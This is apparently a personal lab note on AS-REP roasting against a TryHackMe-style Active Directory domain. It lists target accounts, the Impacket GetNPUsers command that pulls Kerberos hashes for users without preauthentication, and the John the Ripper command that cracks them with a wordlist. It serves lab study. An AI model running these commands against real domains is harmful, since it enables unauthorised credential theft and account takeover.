AS-REP Roasting using Impacket

windows, ad, kerberos, foothold

Overview #

Steps #

10.10.135.224 SPOOKYSEC.local
svc-admin@spookysec.local
James@spookysec.local
robin@spookysec.local
darkstar@spookysec.local
administrator@spookysec.local
backup@spookysec.local
paradox@spookysec.local
JAMES@spookysec.local
Robin@spookysec.local
Administrator@spookysec.local
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py SPOOKYSEC.local/ -usersfile users.txt -format john -outputfile out.john -no-pass

john --wordlist=/usr/share/wordlists/rockyou.txt out.john

Gotchas #

I encounter an issue on THM ra box. Output tells that user doesn’t require preauth set.

[-] User buse@windcorp.thm doesn't have UF_DONT_REQUIRE_PREAUTH set

But then there was no hashes dumped. When I checked the connections in wireshark, I see that its requiring pre auth!